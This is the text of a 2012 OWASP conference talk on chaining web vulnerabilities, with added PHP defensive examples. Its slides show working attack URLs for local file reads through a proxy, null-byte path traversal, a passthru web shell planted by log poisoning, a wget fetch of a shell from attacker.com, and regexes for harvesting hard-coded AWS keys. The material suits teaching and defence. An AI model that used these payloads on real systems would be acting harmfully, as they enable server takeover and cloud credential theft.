Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Attack Chaining Advanced Maneuvers for Hack Fu OWASP ATL
31 May 2012
About Us – Who Are These Dudes?
• Rob – Sr. Security Associate @ Stach & Liu
• Oscar – Security Associate @ Stach & Liu
Penetration Test vs. Vulnerability Assessment

Penetration Testing
“Simulate a real world attack against a target network or application.”
- EVERYBODY
It answers the question, “could someone break in?”
Penetration Testing – phases (from the diagram):
1. Information Gathering
2. Exploit & Penetrate
3. Escalate Privileges
4a. Maintain Access
4b. Deny Access
Pen Testing Scenario
• Web application penetration test
• Cloud-based infrastructure hosts multiple sites
• Out-sourced PHP development to many contractors
• Determine the attacker's ability to compromise PII or infrastructure
Step 1 – Explore
Step 2 – Read Code
http://vuln.com/dir/share.js
... AJAX.Call({ method:'POST', url:'include/s_proxy.php' ...
Step 3 – Proxy?
http://vuln.com/dir/include/s_proxy.php?redirect_url=http://www.google.com
Step 4 – Read Local Files!
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/passwd
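The proxy in Steps 3–4 fetches whatever redirect_url names, which is why a file:// URL hands back the local disk. The check a defender wants in front of that fetch is a strict target validator. The following is an added example and is not the deck's or the tested site's code; the allowlisted host names, the function names, and the assumed original shape of the script (user input passed straight to file_get_contents) are assumptions.

```php
<?php
// Added example (not from the deck): validate a proxy target before fetching it.
// Assumed vulnerable original:  echo file_get_contents($_GET['redirect_url']);
declare(strict_types=1);

// Assumed allowlist of hosts the proxy is permitted to reach.
const ALLOWED_PROXY_HOSTS = ['api.example.com', 'cdn.example.com'];

/**
 * Return the URL unchanged if it is an acceptable proxy target, otherwise null.
 */
function allowed_proxy_target(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                     // file:///etc/passwd parses with no host
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;                     // rejects file://, php://, ftp://, gopher:// ...
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                     // no user@host confusion
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_PROXY_HOSTS, true)) {
        return null;                     // named hosts only, never "anything on the web"
    }
    return $url;
}

/**
 * Hardened fetch: validate first, and do not follow redirects so an allowed
 * host cannot bounce the server to a file:// URL or an internal address.
 */
function proxy_fetch(string $userUrl): string
{
    $target = allowed_proxy_target($userUrl);
    if ($target === null) {
        http_response_code(400);
        return 'redirect_url not permitted';
    }
    $ctx  = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 5]]);
    $body = @file_get_contents($target, false, $ctx);
    return $body === false ? 'upstream error' : $body;
}

// Self-check when run from the command line: php proxy_check.php (file name assumed)
if (PHP_SAPI === 'cli') {
    $cases = [
        'file:///etc/passwd'                => null,
        'http://www.google.com'             => null,
        'https://api.example.com/v1/status' => 'https://api.example.com/v1/status',
        'http://user@api.example.com/'      => null,
        'php://filter/resource=index.php'   => null,
    ];
    foreach ($cases as $input => $expected) {
        $got = allowed_proxy_target($input);
        printf("%-36s => %s\n", $input, $got === $expected ? 'OK' : 'MISMATCH');
    }
}
```

Scheme and host checks stop the file:// read shown on the slide; the no-redirect context closes the follow-up problem of an allowed host redirecting the server somewhere else.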
Attack Chaining – Maneuver 1
Step 5 – Gather More Info
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/httpd.conf
Step 6 – Keep Going…
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
<VirtualHost *>
    ServerName vuln.com
    DocumentRoot /var/www/sites/vuln.com/docroot
    ErrorLog logs/vuln.com_error_log
</VirtualHost>
Step 7 – Back to DirBuster
Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
<?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile);
exit;
?>
Attack Chaining – Maneuver 2
Step 9 – Null Byte Injection
http://vuln.com/dir/include/controller.php?module=../../../../../../etc/passwd%00
Step 8 – Review Code
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php
<?php
require_once('includes/config.php');
$module = !empty($_REQUEST['module']) ? $_REQUEST['module'] : $config['module'];
$action = !empty($_REQUEST['action']) ? $_REQUEST['action'] : $config['action'];
$currentModuleFile = 'modules/'.$module.'/'.$action.'.php';
include($currentModuleFile);
exit;
?>
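The controller above builds an include path from two request parameters with no check at all, so "../" walks out of modules/ and the %00 truncates the appended "/index.php". PHP 5.3.4 and later reject paths containing a NUL byte in include(), but that alone leaves the traversal. What follows is an added example of a hardened replacement, not the site's real fix; the module registry, the directory layout and the function names are assumptions.

```php
<?php
// Added example (not from the deck): a replacement for the controller's include logic.
declare(strict_types=1);

const DEFAULT_MODULE = 'home';    // assumed defaults, standing in for $config['module'] / ['action']
const DEFAULT_ACTION = 'index';

/**
 * Resolve the module file to include, or return null if the request is unacceptable.
 * Three independent checks; any one of them breaks the chain shown on the slides:
 *   1. a strict character allowlist ("/", ".", and NUL cannot survive it),
 *   2. an explicit registry of the module/action pairs the application ships,
 *   3. realpath() confinement to the modules directory.
 */
function resolve_module_file(array $request, array $registry, string $modulesDir): ?string
{
    $module = $request['module'] ?? DEFAULT_MODULE;
    $action = $request['action'] ?? DEFAULT_ACTION;

    // 1. Allowlist: lowercase identifiers only. "../../etc/passwd\0" fails on its first byte.
    foreach ([$module, $action] as $part) {
        if (!is_string($part) || !preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $part)) {
            return null;
        }
    }

    // 2. Registry: only pairs the application actually defines.
    if (!isset($registry[$module]) || !in_array($action, $registry[$module], true)) {
        return null;
    }

    // 3. Confinement: the resolved file must lie under the modules directory.
    $path = realpath($modulesDir . '/' . $module . '/' . $action . '.php');
    $base = realpath($modulesDir);
    if ($path === false || $base === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Self-check from the command line: builds a throwaway modules tree, then tries the slide's inputs.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/modules_demo_' . getmypid();
    mkdir($dir . '/home', 0700, true);
    file_put_contents($dir . '/home/index.php', "<?php echo 'home';\n");
    $registry = ['home' => ['index']];                     // assumed registry

    $cases = [
        'legit'          => ['module' => 'home', 'action' => 'index'],
        'traversal+NUL'  => ['module' => "../../../../../../etc/passwd\0", 'action' => 'index'],
        'error log+NUL'  => ['module' => "/../../../../etc/httpd/logs/vuln.com_error_log\0", 'action' => 'index'],
        'unregistered'   => ['module' => 'admin', 'action' => 'index'],
    ];
    foreach ($cases as $label => $req) {
        $file = resolve_module_file($req, $registry, $dir);
        printf("%-15s => %s\n", $label, $file === null ? 'rejected' : 'include ' . $file);
    }
    unlink($dir . '/home/index.php');
    rmdir($dir . '/home');
    rmdir($dir);
}
```

The registry is the check that matters most: even if a future refactor loosens the character class, the include can only ever reach a file the application deliberately listed.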
Step 10 – Review Gathered Info
Step 10 – Back to Virtual Conf
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/conf/virtual.conf
<VirtualHost *>
    ServerName vuln.com
    DocumentRoot /var/www/sites/vuln.com/docroot
    ErrorLog logs/vuln.com_error_log
</VirtualHost>
Step 11 – Where To Stick It?
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
Step 12 – Poison Logs
<? echo '<pre>'; passthru($_GET['cmd']); echo '</pre>'; ?>
Step 13 – PHP in the Log
http://vuln.com/dir/include/s_proxy.php?redirect_url=file:///etc/httpd/logs/vuln.com_error_log
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/
[error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo '<pre>';passthru($_GET['cmd']);echo '<pre>'; ?>
Step 14 – Execute Code
http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls;
<? echo '<pre>'; passthru('ls'); echo '</pre>'; ?>
/var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php …
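Every stage of Steps 9–14 leaves a distinctive mark in the web server's own logs: a file:// value handed to the proxy, "../" runs and %00 in the module parameter, a PHP open tag sitting in a referer, and a cmd= parameter. The detector below is an added example, not part of the deck; it runs over constructed Apache-style lines modelled on the error-log excerpt above (RFC 5737 test addresses, made-up timestamps), and the indicator names are my own.

```php
<?php
// Added example (not from the deck): flag LFI / log-poisoning indicators in web server logs.
declare(strict_types=1);

/** Indicator patterns; the key names the stage of the chain each one points at. */
const LFI_INDICATORS = [
    'null byte in request'    => '/%00|\x00/',
    'directory traversal'     => '#(\.\./){2,}|(%2e%2e%2f){2,}#i',
    'file:// given to proxy'  => '#redirect_url=file:#i',
    'php tag in referer/ua'   => '#<\?(php)?\s#i',      // "<? echo ..." written into the log
    'command parameter'       => '/[?&]cmd=/',
];

/**
 * Return [indicator name, matching line] pairs for every line that trips an indicator.
 * A line can appear more than once when it matches several indicators.
 */
function scan_log_lines(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        foreach (LFI_INDICATORS as $name => $re) {
            if (preg_match($re, $line) === 1) {
                $hits[] = [$name, $line];
            }
        }
    }
    return $hits;
}

// Constructed sample: two error-log lines shaped like the slide's, four access-log lines.
$sample = [
    '[error] [client 192.0.2.10] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat.jpg, referer: http://www.vuln.com/',
    '[error] [client 192.0.2.10] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/lulzcat-attack.jpg, referer: <? echo \'<pre>\';passthru($_GET[\'cmd\']);echo \'</pre>\'; ?>',
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /dir/include/s_proxy.php?redirect_url=file:///etc/passwd HTTP/1.1" 200 1523',
    '192.0.2.10 - - [01/Jan/2012:10:01:00 +0000] "GET /dir/include/controller.php?module=../../../../../../etc/passwd%00&action=index HTTP/1.1" 200 1523',
    '192.0.2.10 - - [01/Jan/2012:10:02:00 +0000] "GET /dir/include/controller.php?module=/../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=ls HTTP/1.1" 200 411',
    '192.0.2.11 - - [01/Jan/2012:10:03:00 +0000] "GET /dir/index.php?module=home&action=index HTTP/1.1" 200 8800',
];

if (PHP_SAPI === 'cli') {
    foreach (scan_log_lines($sample) as [$name, $line]) {
        printf("%-24s %s\n", $name, substr($line, 0, 100));
    }
}
```

Run with the CLI (php lfi_scan.php, file name assumed): the benign first and last lines produce nothing, while the poisoned referer, the file:// fetch and the two traversal requests each surface under their own indicator. The same patterns work as alert rules in a log pipeline; the "php tag" one is the cheapest early warning that a log file is being prepared as an include target.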
Attack Chaining – Maneuver 3
Step 15 – Upload Shell
http://vuln.com/dir/include/controller.php?module=/../../../../../../../../etc/httpd/logs/vuln.com_error_log%00&cmd=wget%20http://attacker.com/gny.php;
Step 16 – Enjoy!
Step 17 – I want more!
Step 18 – Amazon AWS Regex
ec2[^\d]["'][A-Z0-9]{20}["']
ec2.*["'][A-Z0-9]{20}["']
["'][A-Za-z0-9+/]{40}["']
ec2.*["'][A-Z0-9]{20}["']
ec2(\D)*["'][A-Z0-9]{20}["']
amazon.*["'][A-Z0-9]{20}["']
(amazon|ec2).*["'][A-Z0-9]{20}["']
amazon(\D)*["'][A-Z0-9]{20}["']
access
secret
["'][A-Z0-9]{20}["']
[A-Za-z0-9+/]{40}
amazon.*["'][A-Z0-9]{20}["'].*["'][A-Za-z0-9+/]{40}["']
aws.*["'][A-Z0-9]{20}["']
["'][A-Za-z0-9+/]{40}["']
amazon.*["'][A-Z0-9]{20}["']
["'][A-Za-z0-9+/]{40}["']
secret.*["'][A-Za-z0-9+/]{40}["']
["'][A-Za-z0-9+/]{40}["'].*amazon
$this->amazonService = new Zend_Service_Amazon('DB3BAD768F2F11C7628',
$aws_key = '8AFB5AF55D1E6620EE1';
define('AMAZON_KEY', '372B8E408D1484C538F');
if (!defined('awsAccessKey')) define('awsAccessKey', '9F6EB7471C926194884');
//if (!defined('awsAccessKey')) define('awsAccessKey', '4CAD89B86344CD8C26C');
define('AMAZON_AES_ACCESS_KEY_ID', '95C95B8DC84AA24C0EC');
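The regex list above boils down to two shapes: a 20-character [A-Z0-9] access key and a 40-character base64-style secret, each within reach of a marker word such as amazon, aws, ec2 or secret. The scanner below is an added example that is not the presenters' tool; it folds those shapes into two patterns, runs them over a constructed PHP fixture (the key values are the AWS documentation's "EXAMPLE" placeholders and similar made-up strings), and masks what it finds so the report is not itself a leak. A defender runs this over a code base or as a pre-commit hook.

```php
<?php
// Added example (not from the deck): find hard-coded AWS credentials in source text.
declare(strict_types=1);

// Marker word, then up to 80 non-newline characters (lazy), then a quoted 20-char access key.
const ACCESS_KEY_RE = '/(?i:amazon|aws|ec2)[^\n]{0,80}?["\']([A-Z0-9]{20})["\']/';
// Marker word, then a quoted 40-char secret made of base64-style characters.
const SECRET_KEY_RE = '/(?i:secret|aws|amazon)[^\n]{0,80}?["\']([A-Za-z0-9+\/]{40})["\']/';

/** Keep the first and last four characters so a finding can be located without being reusable. */
function mask(string $value): string
{
    return substr($value, 0, 4) . str_repeat('*', strlen($value) - 8) . substr($value, -4);
}

/**
 * Scan source text and return findings as [line number, kind, masked value].
 */
function find_aws_credentials(string $source): array
{
    $findings = [];
    foreach (explode("\n", $source) as $i => $line) {
        if (preg_match_all(ACCESS_KEY_RE, $line, $m)) {
            foreach ($m[1] as $key) {
                $findings[] = [$i + 1, 'access key', mask($key)];
            }
        }
        if (preg_match_all(SECRET_KEY_RE, $line, $m)) {
            foreach ($m[1] as $key) {
                $findings[] = [$i + 1, 'secret key', mask($key)];
            }
        }
    }
    return $findings;
}

// Constructed fixture shaped like the snippets on the slide; all values are placeholders.
$fixture = <<<'PHP'
<?php
// constructed test fixture
$this->amazonService = new Zend_Service_Amazon('AKIAEXAMPLEEXAMPLE01', 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY');
define('AMAZON_KEY', 'AKIAEXAMPLEEXAMPLE02');
$aws_secret = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY';
$unrelated = 'ABCDEFGHIJKLMNOPQRST';   // 20 chars but no marker word on the line: ignored
PHP;

if (PHP_SAPI === 'cli') {
    foreach (find_aws_credentials($fixture) as [$lineNo, $kind, $masked]) {
        printf("line %2d  %-10s  %s\n", $lineNo, $kind, $masked);
    }
}
```

On the fixture this reports an access key and a secret on line 3, an access key on line 4 and a secret on line 5, and nothing for the marker-less line 6. The marker requirement is what keeps the false-positive rate tolerable; the deck's bare `[A-Za-z0-9+/]{40}` pattern on its own will also match hashes and base64 blobs.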
Step 19 – AWS Takeover
Step 20 – Make It Your Own

Cost of Amazon Cloud Compromise
1. Found 8 Amazon Secret Keys to access Amazon S3
2. Found that 2 of the 8 have administrator access to Amazon EC2
3. Attacker launches 100 Extra Large Clusters
$1,049,000
CRITICAL EXPOSURE

Take Them Off The Web
1. Found 8 Amazon Secret Keys to access Amazon S3
2. Found that 2 of the 8 have administrator access to Amazon EC2
3. Attacker shuts down and deletes all servers and backups permanently
PRICELESS
CRITICAL EXPOSURE
Attack Chaining – Hack Fu
Why Is This Happening?
1. Local File Include
   • File Read Only
   • Code Execution
2. Null Byte Injection
3. Log Poisoning
4. Insecure Credential Storage
5. Overly Permissive Amazon AWS Keys
6. Sensitive Information Disclosure
Web → Mass Malware Deployment
Web → Data Center Compromise
Web → Internal Network Compromise
Internal Assessment → SSN & Bank #’s
Infrastructure Review
Step 1 – Target Wireless
Step 2 – Port Scan
Step 3 – Test Default Creds
Infrastructure Apocalypse
Step 4 – Control AP
Step 5 – Read All E-mail
Step 6 – Listen To VOIP
Step 7 – Open All Doors
Step 7 – Server Room Door
Is This Real Life?
1. Insecure Wireless Encryption
2. Improper Network Segmentation
3. Insecure Default Configuration
4. Weak Passwords
5. Sensitive Information Disclosure
Protection – How?
1. People
2. Policy
3. Processes
4. Strategic / Tactical Security
5. Defense In-Depth
Defense In-Depth – Is Protection Against...
How Do You Get Better?
Synthesis and Patterns – Can Be Both Good and Bad
Attack Visualization – Like Bobby Fischer
Thank You